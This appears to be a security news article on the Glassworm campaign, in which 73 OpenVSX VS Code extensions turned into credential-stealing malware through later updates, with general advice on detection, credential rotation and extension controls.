Glassworm Attackers Deploy 73 Malicious VS Code Extensions in OpenVSX
Security researchers uncovered a sophisticated supply chain attack on April 27, 2026, targeting the OpenVSX marketplace with 73 malicious Visual Studio Code extensions. The campaign, dubbed Glassworm, represents a significant escalation in attacks against developer tools and open-source ecosystems.
The malicious extensions were designed as "sleeper" packages that initially appeared legitimate and functional. After developers installed them and used them for routine coding tasks, the extensions would receive updates that transformed them into data-stealing malware. This delayed activation technique helped the extensions evade initial security reviews and gain developer trust before revealing their malicious nature.
Researchers from multiple security firms identified the campaign after noticing suspicious network traffic patterns from developer workstations. The extensions targeted popular development workflows, including code formatting, syntax highlighting, and project management tools. Each extension was carefully crafted to mimic legitimate functionality while hiding backdoor capabilities that activated only after specific update triggers.
The attack methodology represents a sophisticated understanding of developer behavior and marketplace security mechanisms. By publishing initially benign extensions and waiting to deploy malicious payloads through updates, the attackers bypassed automated security scans that typically focus on initial package submissions. The CISA Known Exploited Vulnerabilities catalog has been updated to include indicators related to this campaign.
OpenVSX marketplace administrators were notified immediately and began removing the identified extensions. The marketplace implemented additional security measures to prevent similar attacks, including enhanced monitoring of extension updates and stricter review processes for packages that request sensitive permissions after initial publication.
Developer Workstations and Enterprise Environments at Risk
The Glassworm campaign primarily targeted software developers using Visual Studio Code with the OpenVSX marketplace integration. Affected users include individual developers, development teams at technology companies, and enterprise environments where VS Code serves as the primary integrated development environment. The extensions specifically targeted Windows, macOS, and Linux workstations running VS Code versions 1.85 through 1.88.
Enterprise environments face particularly severe risks because developer workstations often have elevated privileges and access to sensitive codebases, internal repositories, and production systems. The malicious extensions were designed to steal browser-stored credentials, SSH keys, API tokens, and source code from active projects. Organizations using VS Code for cloud development, DevOps workflows, and continuous integration pipelines represent high-value targets for the attackers.
The extensions collected system information including installed software, network configurations, and active development projects. This reconnaissance data could enable follow-up attacks against corporate infrastructure or intellectual property theft. Development teams working on proprietary software, financial applications, or government projects face elevated risks from this type of supply chain compromise.
Security researchers estimate that thousands of developers may have installed at least one of the malicious extensions before their removal. The exact number of affected systems remains under investigation, but telemetry data suggests the extensions were downloaded over 50,000 times across different developer communities and geographic regions.
Immediate Response and Mitigation Steps for Development Teams
Development teams should immediately audit their VS Code installations for any extensions downloaded from OpenVSX between March 15 and April 27, 2026. Organizations can identify potentially compromised systems by checking VS Code extension logs and reviewing network traffic for suspicious outbound connections to known command-and-control domains associated with the Glassworm campaign.
System administrators should implement network monitoring to detect data exfiltration attempts from developer workstations. The malicious extensions communicated with remote servers using encrypted HTTPS connections to domains that mimicked legitimate development services. Security teams should block access to the identified malicious domains and monitor for similar patterns in network traffic logs.
Affected developers must immediately change all stored credentials, including GitHub tokens, cloud service API keys, database passwords, and SSH keys that may have been accessible to the malicious extensions. Organizations should rotate service account credentials and review access logs for any unauthorized activities during the potential compromise window.
The detailed technical analysis provides specific indicators of compromise and detection methods for security teams. VS Code users should update to the latest version and enable enhanced security features that provide better visibility into extension permissions and network activities.
Long-term mitigation strategies include implementing stricter controls over extension installations in enterprise environments, using application allowlisting for development tools, and establishing regular security reviews of installed extensions. Organizations should also consider using private extension marketplaces or curated extension repositories to reduce exposure to supply chain attacks targeting public marketplaces.
